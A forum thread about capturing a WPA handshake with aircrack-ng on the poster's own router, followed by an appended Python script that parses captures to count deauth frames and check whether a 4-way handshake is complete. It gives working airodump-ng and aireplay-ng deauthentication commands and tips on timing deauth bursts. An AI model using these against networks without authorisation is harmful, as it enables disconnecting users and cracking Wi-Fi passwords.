WPA Handshake not working


gavshouse

OK, hi. I've watched the show (season 5 ep 18, I think) where they show how to hack WPA, and I've also watched many YouTube videos. I'm typing in all the right commands but it's not working correctly.

First off, a little info:

Router ESSID:staniforth

Wifi Interface:wifi0

BSSID:00:17:3F:53:37:BE

Client Mac: 00:17:3F:71:EA:F5

I have 1 computer connected. I obviously know the password, so I'm trying to disconnect it, which works, then get the handshake.

sudo airodump-ng -c 3 -b 00:17:3F:53:37:BE -w staniforth_a wifi0

sudo aireplay-ng -0 30 -a 00:17:3F:53:37:BE -c 00:17:3F:71:EA:F5 wifi0

It all works, my other computer reconnects, but nothing happens.

gav@gav-laptop:~$ sudo airmon-ng start wifi0
[sudo] password for gav: 


Interface    Chipset        Driver

wifi0        Centrino a/b/g    ipwraw-ng (monitor mode enabled)
wlan1        Ralink 2573 USB    rt73usb - [phy2]

13:26:27  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]
13:26:27  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]
13:26:28  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]
13:26:28  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]

 3 ][ Elapsed: 37 s ][ 2009-09-02 13:27 
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                         
 00:17:3F:53:37:BE   -1 100      362      106    0   3  48  WPA  TKIP   PSK  staniforth                 
                                                                                                         
 BSSID              STATION            PWR  Lost  Packets  Probes                                        
                                                                                                         
 00:17:3F:53:37:BE  00:17:3F:71:EA:F5   -1     0      106

Any thoughts?

Are you sending it to a Belkin router or to the user's MAC address (their NIC)? Looks like it might be the router. If I remember correctly you need to send the deauth to the user's MAC, not the router. Try sending the deauth to "00:17:3F:53:37:BE" instead of "00:17:3F:71:EA:F5".

I think to the MAC.

I've tried

sudo aireplay-ng -0 50 -a 00:17:3F:71:EA:F5 -c 00:17:3F:53:37:BE wifi0

and

sudo aireplay-ng -0 50 -a 00:17:3F:53:37:BE -c 00:17:3F:71:EA:F5 wifi0

Both disconnect the PC and it reconnects, but it doesn't pop up saying it's got the handshake.

I would send 4 at a time, then 4 more, then 4 more; space them out. 50 is just overkill. Run the command several times with a second or two between tries, but so long as your card is in monitor mode and capturing on the correct channel you should have the handshake in the pcap after a few deauths and reconnects.

Maybe you are missing a step, or your card isn't properly doing monitor mode, or it's too far away, etc. Could be a number of reasons.

Check this video, might help you out a bit more:

Yeah, OK, I'm 100% sure it's working. I have got a handshake in my .cap and it found my keys. My commands are correct; I've also run an injection test:

gav@gav-laptop:~/Desktop/hack$ sudo aireplay-ng --test wifi0
01:11:59  Trying broadcast probe requests...
01:11:59  Injection is working!
01:12:00  Found 1 AP 

01:12:00  Trying directed probe requests...
01:12:00  00:17:3F:53:37:BE - channel: 3 - 'Belkin54g'
01:12:03  Ping (min/avg/max): 2.038ms/17.191ms/33.515ms
01:12:03  21/30: 70%

gav@gav-laptop:~/Desktop/hack$

So the question is: why is it getting the handshake but not reporting it back?

I had this issue when I was testing my WPA with my password in a text file along with some common dictionary words. My password was at the very end of the file, so it should have been successful in the end. I couldn't figure it out and moved on.

After I grabbed aircrack-ng from the SVN, it worked like a charm. I would suggest getting the latest and greatest and trying again.

I think you've mistaken what I'm asking. I have decrypted a key, "wikipedia", which I simply wrote in, so that means it had the handshake, but airodump-ng didn't report back saying it had the handshake in the first place. Sorry if I'm not clear.

Maybe download the latest version anyway, like suggested, and see what happens.

You don't catch the handshake via typing it in on the client. You send deauths to the router masquerading as the client, then catch the handshake. I'm sure it will work either way, but that's the way I've always done it.
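The question running through the whole thread is what a capture has to contain before airodump-ng (and later aircrack-ng) will treat it as a WPA handshake. The script below is an added example, not from the original thread and not aircrack-ng project code: it reads a classic pcap of the kind `airodump-ng -w` writes (link type 105, raw 802.11 frames without a radiotap header), counts deauthentication frames per BSSID/station pair the way a wireless IDS would flag a deauth burst, classifies each EAPOL-Key frame as message 1 to 4 from its Key Information bits, and then applies the rule aircrack-ng needs for cracking: message 2 (SNonce and MIC) plus the ANonce from message 1 or message 3 of the same exchange, matched by replay counter. The BSSID and client MAC are the ones from the thread; the second client, the frame builders, the zeroed nonces and MICs, and the timestamps are constructed for the sample and are assumptions. The second client deliberately shows the case this thread describes: the AP side of the exchange is in the capture but the client's message 2 never arrived, so no handshake is reported.

```python
"""Offline checks on an airodump-ng style .cap (classic pcap, link type 105 = raw 802.11):
count deauth frames per BSSID/station and decide whether the EAPOL frames captured form a
4-way handshake that aircrack-ng could actually use. Added example, not aircrack-ng code."""
import struct
from collections import Counter

DLT_IEEE802_11 = 105                                 # raw 802.11 frames, no radiotap header
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")   # LLC/SNAP header with ethertype 0x888E (EAPOL)


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def iter_pcap_frames(data):
    """Yield raw frames from little-endian classic pcap bytes; refuse other link types."""
    magic, _maj, _min, _tz, _sig, _snap, linktype = struct.unpack("<IHHiIII", data[:24])
    if magic != 0xA1B2C3D4 or linktype != DLT_IEEE802_11:
        raise ValueError("expected little-endian pcap with link type 105 (IEEE802_11)")
    off = 24
    while off + 16 <= len(data):
        _ts, _us, incl, _orig = struct.unpack("<IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl]
        off += incl


def parse_frame(frame):
    """Describe a deauth or pairwise EAPOL-Key frame as a dict; return None for anything else."""
    if len(frame) < 26:
        return None
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 3, fc0 >> 4
    tods, fromds = fc1 & 1, (fc1 >> 1) & 1
    a1, a2, a3 = mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])
    if ftype == 0 and subtype == 12:                                   # management / deauthentication
        reason = struct.unpack("<H", frame[24:26])[0]
        return {"kind": "deauth", "dst": a1, "src": a2, "bssid": a3, "reason": reason}
    if ftype != 2:
        return None
    bssid = a1 if tods else a2 if fromds else a3                       # where the BSSID sits in a data frame
    hdr = 24 + (6 if tods and fromds else 0) + (2 if subtype & 8 else 0)  # Addr4 and QoS Control
    body = frame[hdr:]
    if len(body) < 25 or not body.startswith(LLC_SNAP_EAPOL) or body[9] != 3:  # 802.1X type 3 = EAPOL-Key
        return None
    key = body[12:]                                                    # EAPOL-Key descriptor
    key_info = struct.unpack(">H", key[1:3])[0]
    replay = struct.unpack(">Q", key[5:13])[0]
    pairwise, install = (key_info >> 3) & 1, (key_info >> 6) & 1
    ack, mic, secure = (key_info >> 7) & 1, (key_info >> 8) & 1, (key_info >> 9) & 1
    if not pairwise:
        return None                                                    # group-key handshake, not needed here
    if ack and not mic:
        msg = 1                                                        # AP -> STA, carries ANonce
    elif ack and mic and install:
        msg = 3                                                        # AP -> STA, ANonce again, MIC'd
    elif mic and not secure:
        msg = 2                                                        # STA -> AP, SNonce + MIC
    else:
        msg = 4                                                        # STA -> AP, MIC only (WPA1 M4 may need a key-data-length test)
    return {"kind": "eapol", "msg": msg, "replay": replay, "src": a2, "dst": a1, "bssid": bssid}


def analyse(frames):
    """Per (bssid, station): deauth count, EAPOL messages seen, and whether they form a usable handshake."""
    deauths, eapol = Counter(), {}
    for f in filter(None, map(parse_frame, frames)):
        sta = f["dst"] if f["src"] == f["bssid"] else f["src"]         # the non-AP side of the exchange
        if f["kind"] == "deauth":
            deauths[(f["bssid"], sta)] += 1
        else:
            eapol.setdefault((f["bssid"], sta), {})[f["msg"]] = f["replay"]
    report = {}
    for pair in set(deauths) | set(eapol):
        have = eapol.get(pair, {})
        # Need M2 (SNonce + MIC) and the ANonce from M1 or M3 of the SAME exchange:
        # M1 shares M2's replay counter, M3 carries M2's counter + 1.
        ok = 2 in have and ((1 in have and have[1] == have[2]) or (3 in have and have[3] == have[2] + 1))
        report[pair] = {"messages": sorted(have), "handshake": ok, "deauths": deauths[pair]}
    return report


# --- constructed sample capture (assumptions: zeroed nonces/MICs, made-up timestamps and second client) ---
AP = bytes.fromhex("00173f5337be")        # BSSID from the thread
CLIENT = bytes.fromhex("00173f71eaf5")    # client MAC from the thread
OTHER = bytes.fromhex("00173faabbcc")     # constructed second client


def build_deauth(ap, sta, reason=7):
    """Deauthentication frame addressed from the AP (or something claiming to be it) to the station."""
    return bytes([0xC0, 0x00, 0, 0]) + sta + ap + ap + b"\x00\x00" + struct.pack("<H", reason)


def build_eapol(ap, sta, msg, replay):
    """Minimal EAPOL-Key frame with typical WPA2 Key Information bits for message `msg`."""
    key_info = {1: 0x008A, 2: 0x010A, 3: 0x13CA, 4: 0x030A}[msg]
    key = bytes([2]) + struct.pack(">HHQ", key_info, 16, replay) + bytes(80) + b"\x00\x00"
    eapol = b"\x02\x03" + struct.pack(">H", len(key)) + key
    if msg in (1, 3):   # FromDS: Addr1=DA(sta) Addr2=BSSID Addr3=SA(ap)
        hdr = bytes([0x08, 0x02, 0, 0]) + sta + ap + ap
    else:               # ToDS:   Addr1=BSSID Addr2=SA(sta) Addr3=DA(ap)
        hdr = bytes([0x08, 0x01, 0, 0]) + ap + sta + ap
    return hdr + b"\x00\x00" + LLC_SNAP_EAPOL + eapol


def build_pcap(frames):
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, DLT_IEEE802_11)
    return hdr + b"".join(struct.pack("<IIII", 1251893187 + i, 0, len(f), len(f)) + f
                          for i, f in enumerate(frames))


def sample_capture():
    """4 deauths then a full handshake for CLIENT; for OTHER only the AP's M1 and M3 were heard."""
    frames = [build_deauth(AP, CLIENT) for _ in range(4)]
    frames += [build_eapol(AP, CLIENT, m, rc) for m, rc in ((1, 1), (2, 1), (3, 2), (4, 2))]
    frames += [build_eapol(AP, OTHER, 1, 5), build_eapol(AP, OTHER, 3, 6)]
    return build_pcap(frames)


if __name__ == "__main__":
    for (bssid, sta), r in sorted(analyse(iter_pcap_frames(sample_capture())).items()):
        print(f"{bssid} <-> {sta}: deauths={r['deauths']} eapol={r['messages']} handshake={r['handshake']}")
```

To run it against a real `staniforth_a-01.cap`, replace `sample_capture()` with the file's bytes; if the capture was taken with a radiotap header (link type 127) the frames must have that header stripped first. A pair showing `eapol=[1, 3]` with no message 2 is exactly the situation where a client visibly reconnects but no handshake is reported: the monitor card heard the AP but not the client, which is why distance from the client and the correct channel matter more than the number of deauths sent.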
